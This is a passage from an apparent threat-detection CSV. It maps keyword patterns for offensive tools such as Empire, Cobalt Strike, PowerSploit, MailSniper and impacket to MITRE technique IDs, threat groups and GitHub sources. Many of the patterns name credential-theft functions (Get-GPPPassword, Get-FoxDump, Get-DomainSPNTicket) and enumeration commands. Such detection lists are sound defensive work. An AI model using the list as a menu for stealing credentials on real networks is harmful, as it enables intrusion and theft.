Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLInstanceDomain.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getdomainspnticket*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1558 - T1208 - T1552","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainUser -KerberosPreuthNotRequired -Verbose*","greyware_tool_keyword","powershell","Powerview Enumerate users","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-DomainUser -TrustedToAuth | select userprincipalname","offensive_tool_keyword","AD exploitation cheat 
sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-DXWebcamVideo.ps1*","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","68","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" +"*getent passwd | cut -d: -f1*","greyware_tool_keyword","getent","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-ExchangeAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-ExoPsAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*getExploit.py*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. 
but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" +"*getexploitablesystem*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Get-ExploitableSystem*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Get-ExploitableSystem*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ExploitableUnquotedPath*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-FakeServiceUsers*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*Get-FireFoxHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1151","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getgppgroups *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Get-GPPInnerFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getgpppassword *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - 
T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-GPPPassword -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Get-GPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-GPPPassword*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-GPPPassword.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-GPPPassword.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-HeadersWithPrtCookies*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*GetHijackableDllName*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*Get-ImageNtHeaders*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - 